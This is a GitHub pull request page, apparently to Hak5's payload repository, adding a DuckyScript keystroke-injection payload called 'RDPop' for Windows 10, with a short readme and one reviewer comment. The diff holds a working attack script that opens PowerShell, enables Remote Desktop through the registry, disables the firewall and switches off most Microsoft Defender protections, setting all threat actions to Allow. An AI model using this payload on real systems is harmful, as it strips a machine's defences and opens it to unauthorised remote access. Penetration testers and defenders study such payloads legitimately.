-
Notifications
You must be signed in to change notification settings - Fork 342
new payload-RDPop #234
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
C08W38101
wants to merge
7
commits into
hak5:master
Choose a base branch
from
C08W38101:master
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
new payload-RDPop #234
Changes from all commits
Commits
Show all changes
7 commits
Select commit
Hold shift + click to select a range
698bbb4
Create placeholder
C08W38101 7ec6bf5
Add files via upload
C08W38101 d045b0a
Update payload.txt
C08W38101 65f89f2
Update payload.txt
C08W38101 c78feef
Update payload.txt
C08W38101 9f8badf
Update payload.txt
C08W38101 41e8a7e
Update readme.md
C08W38101 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,24 @@ | ||
| REM title RDPop | ||
| REM description removes restrictions and enables rdp, if given admin privileges | ||
| REM author C08W38101 | ||
| REM target windows 10 | ||
| DEFAULT_DELAY 500 | ||
| GUI r | ||
| STRING powershell | ||
| ENTER | ||
| STRINGLN Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 | ||
| STRINGLN Set-NetFirewallProfile -Enabled False | ||
| STRINGLN Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue | ||
| STRINGLN Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue | ||
| CTRL W |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
|
|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender <sub>cob</sub><sup>web</sup> |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please remove placeholder file.